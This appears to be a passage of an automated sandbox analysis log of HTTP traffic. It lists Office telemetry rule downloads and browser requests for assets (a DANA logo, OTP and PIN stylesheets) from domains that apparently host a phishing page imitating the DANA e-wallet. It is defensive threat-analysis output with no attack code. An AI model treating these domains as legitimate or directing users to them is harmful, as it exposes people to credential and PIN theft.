Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/container.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-316"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/loader.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-619"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/main.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-f27"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/otp.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-4e8"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/pin.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-29a"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dev-danapemulihan.pantheonsite.io/asset/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/jquery.mask.min.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-1ef0"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/google.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-116a"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-31f2"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/indo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-2e5"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-1eb7"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-13d6"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/jquery.mask.min.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-1ef0"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-31f2"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/google.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-116a"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/indo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-2e5"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-1eb7"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-13d6"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
